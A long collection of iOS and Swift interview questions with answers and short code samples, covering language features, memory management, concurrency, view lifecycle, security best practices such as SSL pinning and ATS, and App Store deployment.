When we define a variable as static, it gets attached to the class rather than to an object. The memory for the static variable is allocated at class loading time. A static variable can't be overridden. We can call the variable directly using the class name (Animal.nums), which is why it is also called a type property, instead of using an object name (dog.nums).

Sharing information:

class Animal {
    static var nums = 0
    init() {
        Animal.nums += 1
    }
}
let dog = Animal()
Animal.nums // 1
let cat = Animal()
Animal.nums // 2

As you can see here, I created two separate instances of Animal, but both share the same static variable nums.

Singleton: Often a static constant is used to adopt the singleton pattern. In this case we want no more than one instance of a class to be allocated. To do that, we save the reference to the shared instance inside a static constant and we hide the initializer.

class Singleton {
    static let sharedInstance = Singleton()
    private init() { }
    func doSomething() { }
}

24. Enumerating items in an array

Answer: There are several ways to loop through an array in Swift, but using the enumerated() method is one of my favorites, because it iterates over each of the items while also telling you the item's position in the array. Here's an example:

let array = ["Apples", "Peaches", "Plums"]
for (index, item) in array.enumerated() {
    print("Found \(item) at position \(index)")
}

That will print "Found Apples at position 0", "Found Peaches at position 1", and "Found Plums at position 2".

25. didSet/willSet

Answer: These are property observers, which let you execute code whenever a property has changed. To make them work, we use either didSet to execute code when a property has just been set, or willSet to execute code before a property has been set.

var score = 0 {
    didSet {
        scoreLabel.text = "Score: \(score)"
    }
}

Using this method, any time score is changed by anyone, our score label will be updated.

26.
Mutating Functions

Answer: In Swift, classes are reference types, whereas structures and enumerations are value types. The properties of value types cannot be modified within their instance methods by default; the mutating keyword lifts this restriction. Below is a simple implementation of a stack in Swift that illustrates the use of mutating functions.

struct Stack {
    public private(set) var items = [Int]() // empty items array

    mutating func push(_ item: Int) {
        items.append(item)
    }
    // if we don't write mutating, it will give a compile-time error

    mutating func pop() -> Int? {
        if !items.isEmpty {
            return items.removeLast()
        }
        return nil
    }
}
var stack = Stack()
stack.push(4)
stack.push(78)
stack.items // [4, 78]
stack.pop()
stack.items // [4]

27. Difference between points and pixels – the reason we need @2x and @3x icons

Answer:

The problem of higher pixel density: Why do we have to create @2x and @3x icons? Well, not too long ago, all iPhones had a standard resolution. However, all this changed when the iPhone 4 was released. The iPhone 4 came with a retina display with twice as many pixels as before. More pixels meant that graphics appeared clearer to users, but it also meant that graphics designed for a non-retina device would appear smaller on a retina display. For example, a 100px by 100px image sized for a non-retina device would look like a 50px by 50px image on a retina display, even though its actual size is still 100px by 100px. Things only got worse with the introduction of the iPhone 6 Plus, which had three times as many pixels as the older devices.

How points solved differing pixel densities: To ensure that graphics display at the correct size regardless of device, Apple came up with the system of points. A point is a device-independent measurement. On non-retina devices, 1 point is equal to 1 pixel. On retina devices like the iPhone 4, 5 and 6, 1 point is equal to 2 pixels. And on larger devices with higher pixel density, like the iPhone 6 Plus, 1 point is equal to 3 pixels.

28. Why don't we use strong for an enum property in Objective-C?
Answer: Because enums aren't objects, so we don't specify strong or weak here.

29. What is the super keyword?

Answer: The 'super' keyword is used as a prefix to access the methods, properties and subscripts declared in the superclass.

class Circle {
    var radius = 12.5
    var area: String {
        return "of rectangle for \(radius) "
    }
}
class Rectangle: Circle {
    var print = 7
    override var area: String {
        return super.area + " is now overridden as \(print)"
    }
}

30. What is NSObject?

Answer: NSObject is called the universal base class for all Cocoa Touch classes.

31. What is a reuseIdentifier?

Answer: The reuseIdentifier is used to indicate that a cell can be re-used in a UITableView. For example, cells that scroll off screen are placed in a reuse queue and handed back by dequeueReusableCell(withIdentifier:) instead of new cells being allocated.

32. What's a completion handler?

Answer: A completion handler is a closure passed as an argument to a function, which is called back when a (typically asynchronous) task, such as a network request, has finished.

33. Explain the difference between atomic and nonatomic synthesized properties.

Answer: An atomic property (the default in Objective-C) guarantees that a whole value is always returned or stored, even when the property is accessed from multiple threads at once, at a small performance cost. A nonatomic property makes no such guarantee and is therefore faster to access.

34. Which API would you use to write test scripts to exercise the application's UI elements?

Answer: The UI Automation API is used to automate test procedures. JavaScript test scripts written against the UI Automation API simulate user interaction with the application and return log information to the host computer.

35. Which framework is used to construct an application's user interface for iOS?

Answer: UIKit.

36. Which is the application thread from which UIKit classes should be used?

Answer: UIKit classes should be used only from an application's main thread.

37. What is the responder chain?

Answer: A responder chain is a hierarchy of objects that have the opportunity to respond to events received. When an event happens in a view, for example a touch event, the view fires the event to a chain of UIResponder objects associated with the UIView. The first UIResponder is the UIView itself; if it does not handle the event, the event continues up the chain until a UIResponder handles it.
The chain will include UIViewControllers, parent UIViews and their associated UIViewControllers. If none of those handle the event, then the UIWindow is asked if it can handle it, and finally, if that doesn't handle the event either, the UIApplicationDelegate is asked.

38. What are regular expressions?

Answer: Regular expressions are special string patterns that describe how to search through a string, e.g. a regular expression for a strong password, or one for a correctly formatted mobile number.

39. What are functions?

Answer: Functions are self-contained chunks of code that perform a specific task. You give a function a name that identifies what it does, and this name is used to "call" the function to perform its task when needed.

40. What is the difference between viewDidLoad and viewDidAppear? Which should you use to load data from a remote server to display in the view?

Answer: viewDidLoad is called when the view is loaded, whether from a Xib file, a storyboard or programmatically created in loadView. viewDidAppear is called every time the view is presented on the device. Which to use depends on the use case for your data. If the data is fairly static and not likely to change, then it can be loaded in viewDidLoad and cached. However, if the data changes regularly, then using viewDidAppear to load it is better. In both situations, the data should be loaded asynchronously on a background thread to avoid blocking the UI.

41. What considerations do you need when writing a UITableViewController which shows images downloaded from a remote server?

Answer:
- Download images asynchronously (lazy loading) so scrolling is not blocked.
- Cache downloaded images, and only download an image if it is not already in the cache.

42. What is a protocol, how do you define your own, and when is it used?

Answer: A protocol is similar to an interface in Java. It defines a list of required and optional methods that a class must/can implement if it adopts the protocol. Any class can implement a protocol, and other classes can then send messages to that class based on the protocol methods without knowing the type of the class.

43. What are KVC and KVO? Give an example of using KVC to set a value.

Answer: KVC stands for Key-Value Coding: a mechanism by which an object's properties can be accessed using string keys at runtime rather than statically known property names. KVO stands for Key-Value Observing and allows an object to observe changes to another object's property values.
Let's say there is a property name on a class:

@property (nonatomic, copy) NSString *name;

We can access it using KVC:

NSString *n = [object valueForKey:@"name"];

And we can modify its value by sending it the message:

[object setValue:@"Mary" forKey:@"name"];

44. What's your preference when writing UIs? Xib files, storyboards or programmatic UIViews?

Answer: There's no right or wrong answer to this, but it's a great way of seeing if you understand the benefits and challenges of each approach. Here are the common answers:

- Storyboards and Xibs are great for quickly producing UIs that match a design spec. They also make it really easy for product managers to see visually how far along a screen is.
- Storyboards are also great at representing a flow through an application and allowing a high-level visualization of an entire application.
- Storyboards' drawback is that in a team environment they are difficult to work on collaboratively, because they are a single file and merges become difficult to manage.
- Storyboards and Xib files can also suffer from duplication and become difficult to update. For example, if all buttons need to look identical and suddenly need a color change, then it can be a long and difficult process to do this across storyboards and Xibs.
- Programmatically constructing UIViews can be verbose and tedious, but it allows for greater control, easier separation and sharing of code, and easier unit testing.

Most developers will propose a combination of all three where it makes sense to share code, with re-usable UIViews or Xib files.

45. How would you securely store private user data offline on a device? What other security best practices should be taken?

Answer:
- If the data is extremely sensitive, then it should never be stored offline on the device, because all devices are crackable.
- The keychain is one option for storing data securely. However, its encryption is based on the pin code of the device.
Users are not forced to set a pin, so in some situations the data may not even be encrypted. In addition, the user's pin code may be easily hacked.
- A better solution is to use something like SQLCipher, which is a fully encrypted SQLite database. The encryption key can be enforced by the application and kept separate from the user's pin code.

Other security best practices are:
- Only communicate with remote servers over SSL/HTTPS.
- If possible, implement certificate pinning in the application to prevent man-in-the-middle attacks on public WiFi.
- Clear sensitive data out of memory by overwriting it.
- Ensure all validation of data being submitted is also run on the server side.

With SSL pinning, we can refuse all connections except the ones to the designated server whose SSL certificate we've saved into our local bundle. In a man-in-the-middle attack, the attacker sits in the middle of the communication between the device U and the router R, and can eavesdrop on or block it. IP forwarding is often used on the attacker's device to keep the communication flowing seamlessly between the user's device and the router.

Things are a bit more tricky when it comes to NSURLSession SSL pinning. There is no way to set an array of pinned certificates and cancel all responses that don't match our local certificate automatically. We need to perform all checks manually to implement SSL pinning on NSURLSession.

In Alamofire there is the ServerTrustPolicy.certificatesInBundle() method, which returns all the certificates within the bundle. By default, AFNetworking will scan through your bundle, check for all ".cer" files, and add them to the manager.securityPolicy.pinnedCertificates array.

With the release of iOS 9, the App Transport Security library was also introduced. By default, ATS denies all insecure connections which do not use at least the TLS 1.2 protocol.

46. What is an autorelease pool?
Answer: The concept of an autorelease pool is simple: whenever an object instance is marked as autoreleased (for example, NSString *str = [[[NSString alloc] initWithString:@"hello"] autorelease];), it will have a retain count of +1 at that moment in time, but at the end of the run loop the pool is drained, and any object marked autorelease then has its retain count decremented. It's a way of keeping an object around while you prepare whatever will retain it for itself.

47. What is the view life cycle?

Answer:
loadView
viewDidLoad
viewWillAppear
viewWillLayoutSubviews
viewDidLayoutSubviews
viewDidAppear

48. What is a design pattern?

Answer: In plain MVC, the view controller tends to be tightly coupled because of the view life cycle. Common architectural patterns are:
- MVC
- MVP (the mediator, the presenter, is UIKit-independent)
- MVVM (the mediator is the view model and is UIKit-independent)
- VIPER (View, Interactor, Presenter, Entity, Router) – the granularity of responsibilities is very good.

49. A product manager in your company reports that the application is crashing. What do you do?

Answer: You're not given much information, but some interviewers will slip you more details of the issue as you go along. Start simple:
- Get the exact steps to reproduce it.
- Find out the device and iOS version.
- Do they have the latest version?
- Get device logs if possible.

Once you can reproduce it or have more information, then start using tooling. Let's say it crashes because of a memory leak; I'd expect to see someone suggest using the Instruments Leaks tool. A really impressive candidate would start talking about writing a unit test that reproduces the issue and debugging through it. Other variations of this question include a slow UI or the application freezing. Again, the idea is to see how you problem-solve, what tools you know about that would help, and whether you know how to use them correctly.

50. What is Auto Layout? What does it mean when a constraint is "broken" by iOS?
Answer: Auto Layout is a way of laying out UIViews using a set of constraints that specify the location and size relative to other views or based on explicit values. Auto Layout makes it easier to design screens that resize and lay out their components based on the size and orientation of a screen.

Constraints include:
- setting the horizontal/vertical distance between 2 views
- setting the height/width to be a ratio relative to a different view
- a width/height/spacing can be an explicit static value

Sometimes constraints conflict with each other. For example, imagine a UIView which has 2 height constraints: one says make the UIView 200px high, and the second says make the height twice the height of a button. If the iOS runtime cannot satisfy both of these constraints, then it has to pick only one. The other is then reported as being "broken" by iOS.

51. What is the difference between synchronous and asynchronous tasks?

Answer: Synchronous: waits until the task has completed. Asynchronous: completes the task in the background and can notify you when complete.

52. Security updates in iOS 10

Answer: App Transport Security (ATS) was introduced in iOS 9 as a built-in utility for protecting network communications, namely connections which use the NSURLSession and NSURLConnection APIs. Out of the box, ATS enforces a TLS configuration with the following criteria:
- Apps must connect to servers using the TLS 1.2 protocol
- The server must use the HTTPS protocol

Importantly, by the end of 2016, Apple will enforce the use of ATS during App Store approval. It is therefore very important that engineering teams start to roadmap migration to more secure HTTPS configurations as soon as possible. As a developer, you can still configure exceptions in the ATS configuration, but you will be required to provide a justification in the App Store review as to why you require the exception.
During the "What's new in Security" WWDC 2016 session, Apple stated that one example use case for exceptions might be when you communicate with a 3rd party and don't have control over their HTTPS configuration. Another example is when an application communicates dynamically with various internet sites, such as within a WebView. A 3rd example of an exception might be because the domain you want to communicate with does not offer Perfect Forward Secrecy.
ATS required by 2017
App Transport Security was introduced last year and by default blocks "unprotected" connections initiated by Apps, i.e. connections that do not use HTTPS with the strongest TLS version and cipher suites. Because switching servers to the strongest TLS configuration takes time, Apple also allowed App developers to selectively disable ATS requirements by adding exemptions in the App's Info.plist.
Purpose strings required
When built for iOS 10, an App will crash if it tries to request access for a data class that does not have a purpose string defined. Purpose string keys were introduced in iOS 6; there is one key defined for each type of privacy-sensitive data (contacts, camera, photo library, etc.). App developers can add these keys to the App's Info.plist to provide a sentence that explains why the App needs access to the data; the explanation then gets displayed in the user-facing permission prompt. Not providing a purpose string will now crash the App at the moment the permission prompt was going to be displayed. Apple made this change for two reasons:
- It forces App developers to inform the user about the reason why the App needs access to the data.
- It prevents third-party SDKs within the App from requesting access to data the App developers never intended to access in the first place.
Additionally, there are several new consent alerts in iOS 10, each with a corresponding purpose string:
- Media Library, for allowing access to Apple Music subscriber status and playlists.
- Speech Recognition, for allowing audio files to be sent to Apple for speech transcription done on behalf of the App.
- SiriKit, for allowing the App to receive Siri requests.
- TV Provider information (tvOS only), for automatically logging the user into streaming Apps based on their cable subscription.
53. What is the difference between public and open? Why is it important to have both?
Answer: Both make an entity visible outside its defining module, but open additionally allows classes and class members to be subclassed and overridden from another module, while public does not. Having both lets framework authors expose an API for use without giving up control over how it can be extended.
54. What is waterfall methodology and Agile methodology? What are the differences between them?
Answer: Waterfall methodology is a sequential model for software development. It is separated into a sequence of pre-defined phases including feasibility, planning, design, build, test, production, and support. Agile methodology, on the other hand, is an iterative and incremental approach: work is delivered in short cycles, and requirements and plans are continuously revisited.
55. What is the difference between a class and an object?
Answer: In the simplest sense, a class is a blueprint for an object. It describes the properties and behaviours common to any particular type of object. An object, on the other hand, is an instance of a class.
56. Is it faster to iterate through an NSArray or an NSSet?
Answer: When the order of the items is unimportant, NSSet is faster for lookups (containsObject:) because it uses hash values; NSArray has to check its elements one by one, but it preserves order and supports access by index.
59. Generics
Answer: 'Generic' features let you write flexible and reusable functions and types. Generics are used to avoid duplication. For example, if we want to swap two values (which can be Int, String, or Double), then instead of writing different functions for String, Int, and Double we can create one generic function:
func exchange<T>(a: inout T, b: inout T) {
    let temp = a
    a = b
    b = temp
}
var numb1 = 100
var numb2 = 200
print("Before Swapping Int values are: \(numb1) and \(numb2)")
exchange(a: &numb1, b: &numb2)
print("After Swapping Int values are: \(numb1) and \(numb2)")
var str1 = "Generics"
var str2 = "Functions"
print("Before Swapping String values are: \(str1) and \(str2)")
exchange(a: &str1, b: &str2)
print("After Swapping String values are: \(str1) and \(str2)")
Memory Management
What is a memory leak?
A memory leak is memory that was allocated but is never released, typically caused in iOS by a retain cycle in which two objects hold strong references to each other. 60.
What is the difference between weak and strong, read only, copy, retain, unowned ?
Answer: Weak self and unowned self in Swift are hard for many of us to understand. Although Automatic Reference Counting (ARC) solved a lot for us already, we still need to manage references when we're not working with value types. First, references are strong by default.
- Strong means that the reference count will be increased and the object will be kept alive as long as the strong reference exists.
Weak will nullify the pointer whenever the referenced object is deallocated, but unowned won't do that, so an unowned reference may result in a dangling pointer. Because weak references need to allow their value to be changed to nil at runtime, they are always declared as optional variables: when the reference can become nil, use weak (and unwrap with if let); when it can never be nil during the reference's lifetime, use unowned.
weak var customer: Customer?
Weak and unowned are used to solve leaked memory and retain cycles. Neither increases the retain count. Common instances of weak references are delegate properties and subviews/controls of a view controller's main view, since those views are already strongly held by the main view.
Read only: we can set the property initially, but then it can't be changed.
Copy means that we're copying the value of the object when it's assigned; it also prevents its value from changing afterwards.
Retain: in Objective-C, retain is the equivalent of strong — it increases the retain count and keeps the object alive.
unowned: You could use unowned when the other instance has the same lifetime or a longer lifetime. Take the example of Customer and CreditCard. Here, a CreditCard cannot exist without a customer. A CreditCard instance never outlives the Customer that it refers to, and we only create a CreditCard instance by passing a Customer instance to the initialiser. So we can absolutely guarantee that the CreditCard cannot exist without the Customer.
61. What is tuple in swift?
Answer: Tuple is used to group multiple values in a single compound value. The values in a tuple can be of any type, and do not need to be of the same type. For example, ("Tutorials Point", 123)
Design Pattern
62. Why is design pattern very important ?
Answer: Design patterns are reusable solutions to common problems in software design. They're templates designed to help you write code that's easy to understand and reuse. The most common Cocoa design patterns:
- Creational: Singleton.
- Structural: Decorator, Adapter, Facade.
- Behavioral: Observer, Memento.
63. What is extension and why to use?
Answer: A Swift extension is a useful feature that helps in adding more functionality to an existing class, structure, enumeration or protocol type. This includes adding functionality to types for which you don't have the original source code (extensions for Int, Bool, etc.). For example, an extension on UIAlertController with a function that takes title and message parameters lets us reuse it in multiple places instead of writing the whole alert-controller code everywhere.
extension Int {
    var square: Int { return self * self }
    func cube() -> Int { return self * self * self }
    mutating func incrementBy5() {
        self = self + 5
    }
}
var x: Int = 5
print(x.square)  // prints "25"
print(x.cube())  // prints "125"
x.incrementBy5() // x is now 10
64. What is MVC?
Answer: MVC stands for Model-View-Controller. It is a software architecture pattern for implementing user interfaces. MVC consists of three layers: the model, the view, and the controller.
- The model layer is typically where the data resides (persistence, model objects, etc.); it takes data from the database and processes it.
- The view layer is what the user sees and interacts with.
- The controller mediates between the model and the view.
Real life example: a restaurant. The inventory is the database where all groceries are stored (ingredients for pizza). The kitchen is the model where the groceries (data) taken from the inventory (database) are processed (to make the pizza) as required to present to a customer (view). The waiter is the controller who communicates between the customer (view) and the chef (model). The customer's table is the view where the processed food (data) is presented by the waiter (controller). The customer (view) doesn't go directly into the kitchen (model).
65. What is MVVM?
Answer: MVVM stands for Model-View-ViewModel. It is a software architecture pattern for implementing user interfaces. MVVM is an augmented version of MVC where the presentation logic is moved out of the controller and into the view model; because the view model is independent of UIKit, it improves the testability of your code and makes it easier to follow along.
Design, View, Storyboard
66. What's the difference between the frame and the bounds?
Answer: The frame of a UIView is the region relative to the superview it is contained within, while the bounds of a UIView is the region relative to its own coordinate system.
67. Which are the ways of achieving concurrency in iOS?
Answer: The three ways to achieve concurrency in iOS are:
- Threads
- Dispatch queues
- Operation queues
Thread management
68. What is threads?
Answer: Behind the scenes your app can actually execute multiple sets of instructions at the same time, which allows it to take advantage of having multiple CPU cores (modern iOS devices have several cores). Each core can be doing something independently of the others, which hugely boosts your performance. These code execution processes are called threads. Threads execute the code you give them; they don't just randomly execute a few lines from viewDidLoad() each. This means by default your own code executes on only one CPU, because you haven't created threads for other CPUs to work on. All user interface work must occur on the main thread, which is the initial thread your program is created on. You don't get to control when threads execute, or in what order: you create them and give them to the system to run, and the system handles executing them as best it can. If all user interface code must run on the main thread, and we block the main thread by using a synchronous call such as Data(contentsOf:) or a network request, the entire program freezes – the user can touch the screen all they want, but nothing will happen.
69. What is the difference between synchronous and asynchronous task?
Answer: Synchronous tasks wait until the task has been completed while asynchronous tasks can run in the background and send a notification when the task is complete.
70. Explain the difference between Serial vs Concurrent
Answer: Tasks executed serially are executed one at a time while tasks that are executed concurrently may be executed at the same time.
71. What is GCD and how is it used? – concept
GCD stands for Grand Central Dispatch. GCD creates for you a number of queues, and places tasks in those queues depending on how important you say they are. All are FIFO, meaning that each block of code will be taken off the queue in the order it was put in, but more than one code block can be executed at the same time so the finish order isn't guaranteed. "How important" some code is depends on something called "quality of service", or QoS, which decides what level of service this code should be given. Obviously at the top of this is the main queue, which runs on your main thread, and should be used to schedule any work that must update the user interface immediately, even when that means blocking your program from doing anything else. But there are four background queues that you can use, each of which has its own QoS level set:
- User Interactive: this is the highest priority background thread, and should be used when you want a background thread to do work that is important to keep your user interface working. This priority will ask the system to dedicate nearly all available CPU time to you to get the job done as quickly as possible.
- User Initiated: this should be used to execute tasks requested by the user that they are now waiting for in order to continue using your app. It's not as important as user interactive work – i.e., if the user taps on buttons to do other stuff, that should be executed first – but it is important because you're keeping the user waiting.
- The Utility queue: this should be used for long-running tasks that the user is aware of, but not necessarily desperate for now. If the user has requested something and can happily leave it running while they do something else with your app, you should use Utility.
- The Background queue: this is for long-running tasks that the user isn't actively aware of, or at least doesn't care about its progress or when it completes.
Those QoS queues affect the way the system prioritizes your work: User Interactive and User Initiated tasks will be executed as quickly as possible regardless of their effect on battery life, Utility tasks will be executed with a view to keeping power efficiency as high as possible without sacrificing too much performance, whereas Background tasks will be executed with power efficiency as their priority.
72. NSOperationQueue :
Answer: NSOperationQueue is an Objective-C wrapper over GCD. We can set a priority for each operation, and we can start, stop and pause operations, or make one task depend on another. It is used for more complex scenarios.
73. What is dispatch queues?
Answer: Dispatch queues are an easy way to perform tasks asynchronously and concurrently in your application.
Unit testing, UI testing
73. XCTest – XCTAssertEqual, XCTAssertNotNil, XCTAssertTrue
74. What's Code Coverage ?
Answer: Code coverage is a tool that helps us to measure the value of our unit tests by showing which lines of code are exercised by them.
75. What is setUp() and tearDown() in unit testing?
Answer:
- setUp() — This method is called before the invocation of each test method in the given class.
- tearDown() — This method is called after the invocation of each test method in the given class.
Objective c –
76. Explain what is @synthesize in Objective-C?
Answer: Once you have declared a property in Objective-C, you can tell the compiler to generate its accessors by using the synthesize directive. synthesize generates the getter and setter methods for your property.
77. What is @dynamic in Objective-C ?
Answer: @dynamic for a property means that its setters and getters will be provided manually and/or at runtime rather than synthesized by the compiler. We can use @dynamic not only for NSManagedObject.
78. Why do we use synchronized?
Answer: synchronized guarantees that only one thread can be executing the code in the block at any given time.
79. What is the difference between category and extension in Objective-C?
Answer: A category can add methods to an existing class, even without its source code, and is declared in its own file; an extension (an "anonymous category") can also add instance variables and properties, but must be implemented in the class's own implementation file. fm.smartcloud.io/ios-interview-questions-for-senior-developers-in-2017-a94cc81c8205
80. Access controls in Swift
Answer: Access control keywords enable you to hide the implementation details of your code, and to specify a preferred interface through which that code can be accessed and used. There are 5 access controls:
1. open (most accessible, least restrictive)
2. public
3. internal (default)
4. fileprivate
5. private (least accessible, most restrictive)
1. open : It enables an entity to be used inside and outside of the defining module and in any other module. UIButton and UITableView are defined in UIKit. We import UIKit and make a subclass of UITableView to use in our own module. So a subclass of the UITableView defined in UIKit is used in our module; it is accessible in our module.
open class UITableView : UIScrollView, NSCoding { }
2. public : open allows us to subclass from another module. public allows us to subclass or override only from within the module in which it is defined.
public func A() {} // module X
open func B() {}   // module X
// in module Y:
override func A() {} // error
override func B() {} // success
So open classes and class members can be accessed and overridden both in the module where they are defined and in any module that imports it. public classes and class members can be overridden only in the module where they are defined.
3. internal : Internal classes and members can be accessed anywhere within the same module (target) they are defined in. You typically use internal access when defining an app's or a framework's internal structure.
4.
fileprivate : Restricts the use of an entity to its defining file. It is used to hide implementation details when the details are used within an entire file. A fileprivate method is only accessible from the Swift file in which it is defined.
5. private : Restricts the use of an entity to the enclosing declaration and to extensions of that declaration in the same file. It is used to hide the implementation of a single block.
Design pattern
81. What do you know about singletons? Where would you use one and where would you not?
Answer: Singleton is a class that returns only one and the same instance no matter how many times you request it. Singletons are sometimes considered to be an anti-pattern. There are multiple disadvantages to using singletons. The two main ones are global state/statefulness and object life cycle and dependency injection. When you have only one instance of something, it is very tempting to reference and use it everywhere directly instead of injecting it into your objects. That leads to unnecessary coupling of concrete implementation in your code instead of interface abstraction. Another malicious side effect of "convenient" singletons is global state. Quite often singletons enable global state sharing and play the role of a "public bag" that every object uses to store some state. That leads to unpredictable results, bugs and crashes when this uncontrolled state gets overridden or removed by someone. Ex. We can use a singleton in a game where we want to store the score.
82. Could you explain what the difference is between Delegate and KVO?
Answer: Both are ways to set up relationships between objects. Delegation is a one-to-one relationship where one object implements a delegate protocol and another uses it to communicate back, while KVO (Key-Value Observing) lets any number of objects observe changes to a property of another object without the observed object having to know about them. NotificationCenter is a related broadcast mechanism: most people use it for receiving system messages, for example to be notified when the keyboard appears or disappears, but you can also use it to send your own messages inside your app.
App Lifecycle
83. What's the difference between not-running, inactive, active, background and suspended execution states?
Answer:
- Not running: The app has not been launched or was running but was terminated by the system.
- Inactive: The app is running in the foreground, but not receiving events (it may be executing other code though). An iOS app can be placed into an inactive state, for example, when a call or SMS message is received or the user locks the screen.
- Active: The app is running in the foreground and is receiving events.
- Background: The app is in the background and still executing code, usually briefly before being suspended.
- Suspended: The app is in the background in memory but is not executing code; the system may purge it at any time to free memory.
84. Which are the app's state transitions when it is launched?
86. View Lifecycle
Answer: A View Controller manages a set of views and helps in making the application's user interface. It coordinates with model objects and other controller objects. It plays the role of both view objects and controller objects. Each view controller displays its own views for the app content. The views are loaded automatically when the user accesses the view property of the view controller in the app. Let's focus on the events required to load a view.
> Lifecycle events order
init(coder:)
(void)loadView
(void)viewDidLoad
(void)viewWillAppear
(void)viewDidAppear
(void)didReceiveMemoryWarning
(void)viewWillDisappear
(void)viewDidDisappear
How can we use them?
– init init(coder:)
While creating the views of your app in a Storyboard, init(coder:) is the method that gets called to instantiate your view controller and bring it to life. During the initial phase of a view controller, you usually allocate the resources that the view controller will need during its lifetime. In this method, you might instantiate dependencies, including subviews that you'll add to your view programmatically. And note that init(coder:) is called only once during the life of the object, as all init methods are.
– LoadView (void)loadView
It is only called when the view controller is created, and only when it is done programmatically. You can override this method in order to create your views manually. This is the method that creates the view for the view controller. If you are working with storyboards or nib files, then you do not have to do anything with this method and you can ignore it.
Its implementation in UIViewController loads the interface from the interface file and connects all the outlets and actions for you.
– viewDidLoad
-(void)viewDidLoad { [super viewDidLoad]; }
It's only called when the view is created. Keep in mind that in this lifecycle step the view bounds are not final. It is a good place to initialize and set up objects used in the view controller. When this method gets called, the view of the view controller has been created and you are sure that all the outlets are in place. It is also a good place to start some background activity where you need to have the user interface in place at the end. A common case is network calls that you need to make only once when the screen is loaded. This method is called only once in the lifetime of a view controller, so you use it for things that need to happen only once.
– viewWillAppear (void)viewWillAppear:(BOOL)animated
You override this method for tasks that you need to repeat every time a view controller comes on screen. Keep in mind that this method can be called several times for the same instance of a view controller. This event is called every time the view appears, so there is no need to add code here that should be executed just one time. Usually you use this method to update the user interface with data that might have changed while the view controller was not on the screen. You can also prepare the interface for animations you want to trigger when the view controller appears.
– viewDidAppear (void)viewDidAppear:(BOOL)animated
This method gets called after the view controller appears on screen. You can use it to start animations in the user interface, to start playing a video or a sound, or to start collecting data from the network. In some cases it can be a good place to load data from Core Data and present it in the view, or to start requesting data from a server.
– didReceiveMemoryWarning (void)didReceiveMemoryWarning
iOS devices have a limited amount of memory and power.
When the memory starts to fill up, iOS does not use its limited hard disk space to move data out of memory like a computer does. If your app starts using too much memory, iOS will notify it. Since view controllers perform resource management, these notifications are delivered to them through this method. In this way you can take actions to free some memory. Keep in mind that if you ignore memory warnings and the memory used by your app goes over a certain threshold, iOS will terminate your app; this will look like a crash to the user and should be avoided.
– viewWillDisappear (void)viewWillDisappear
Before the transition to the next view controller happens and the origin view controller gets removed from the screen, this method gets called. You rarely need to override this method since there are few common tasks that need to be performed at this point, but you might need it.
– viewDidDisappear (void)viewDidDisappear
After a view controller gets removed from the screen, this method gets called. You usually override this method to stop tasks that should not run while a view controller is not on screen. For example, you can stop listening to notifications, observing other objects' properties, monitoring the device sensors, or a network call that is not needed anymore.
Memory management
87. How is memory management handled in iOS?
Answer: Swift uses Automatic Reference Counting (ARC). This is conceptually the same thing in Swift as it is in Objective-C. ARC keeps track of strong references to instances of classes and increases or decreases their reference count accordingly when you assign or unassign instances of classes (reference types) to constants, properties, and variables. It deallocates memory used by objects whose reference count dropped to zero. ARC does not increase or decrease the reference count of value types because, when assigned, these are copied. By default, if you don't specify otherwise, all references will be strong references.
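A minimal sketch of how ARC and weak interact (the Owner/Pet names are hypothetical, chosen just for illustration): if two objects referenced each other strongly, neither deinit would ever run; marking one side weak breaks the cycle so both objects are deallocated.

```swift
var deinitLog: [String] = []

class Owner {
    var pet: Pet?                       // strong reference to Pet
    deinit { deinitLog.append("Owner") }
}

class Pet {
    weak var owner: Owner?              // weak: does not keep Owner alive
    deinit { deinitLog.append("Pet") }
}

var owner: Owner? = Owner()
var pet: Pet? = Pet()
owner?.pet = pet
pet?.owner = owner

// Pet's reference to Owner is weak, so this drops Owner's only strong
// reference and its deinit runs; Pet is still held by the `pet` variable.
owner = nil
// Now Pet's last strong reference is gone too, and its deinit runs.
pet = nil

print(deinitLog)
```

If `owner` in Pet were declared `var owner: Owner?` (strong) instead, `deinitLog` would stay empty: each object would keep the other's reference count above zero, which is exactly the retain cycle ARC cannot resolve on its own.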
App deployment
88. Diff. between Bundle ID and App ID
Answer:
- A Bundle ID precisely identifies a single app. A bundle ID or bundle identifier uniquely identifies an application in Apple's ecosystem. This means that no two applications can have the same bundle identifier. To avoid conflicts, Apple encourages developers to use reverse domain name notation for choosing an application's bundle identifier. For example, if your organization's domain is abc.com and you create an app named Hello, you could assign the string com.abc.Hello as your app's bundle ID.
- An App ID is a combination of two strings separated by a period (.). String 1 is the team ID, which is assigned to the development team (provided by Apple). String 2 is the bundle ID, which is selected by you. There are two types of App ID:
- Explicit App ID: here the team ID is paired with one specific bundle ID, so the App ID matches only one app. Example: TEAM_ID.BUNDLE_ID
- Wildcard App IDs: here the team ID is paired with multiple bundle IDs, so the App ID matches multiple apps. Examples: TEAM_ID.BUNDLE_ID1, TEAM_ID.BUNDLE_ID2 …
89. Differences between internal testers and external testers in test-flight?
Internal testers:
- Must be added manually via iTC
- 25 max allowed
- Once your app is uploaded it's available immediately for internal testers (before it has been reviewed)
- All internal testers must be added as users in your iTC "Users and Roles" settings, which gives them certain permissions (review other answers and the docs for this). You wouldn't want to give just anyone permissions here.
- Do not have a 60-day time limit
External testers:
- Will only be able to use your uploaded build for up to 60 days. If you add additional builds, they can update, and the 60 days starts over again.
- Will be able to test your app after:
- You have submitted it for review
- It gets approved in TestFlight review and
- You set it to be available for testing.
The review process is usually instant for new builds with the same version number. If you add a new version number, the review process can take up to 48hrs as of 10/2016.
- Up to 2000 email addresses can be added. Each email address will allow a user to install the app on multiple devices. The email addresses do not need to match their Apple IDs.
- They receive an invite to install your app once your first build is available for testing. If you add a new user after making a build available for testing, they'll immediately receive an invite. All users will receive notifications to install newer versions of the app if you upload additional builds.
- Will be disallowed from using your app after you have pushed it to the official app store (which promptly ends the beta) or 60 days have passed since you started the beta, whichever comes first. If you end the beta without launching in the app store, and they try to open it, it will crash. Yay, Apple UX! If you do push a version to the app store with the same bundleName, version, and bundleID (build number doesn't matter), then your beta testers will automatically receive the app-store version of the app when it goes live.
90. What is app thinning?
There are three aspects of app thinning:
1. App Slicing : Slicing is the process of creating and delivering variants of the app bundle — each containing only the resources and architectures a given device needs — for different target devices.
2. On Demand Resources : resources (such as images, sounds or levels) that are hosted on the App Store and downloaded only when the app needs them; the system can remove them again when storage runs low.
3. Bitcode : Bitcode makes apps as fast and efficient as possible on whatever device they're running. Bitcode automatically compiles the app with the most recent compiler and optimizes it for specific architectures. It can be turned on in the project settings under Build Settings by setting Enable Bitcode to YES.
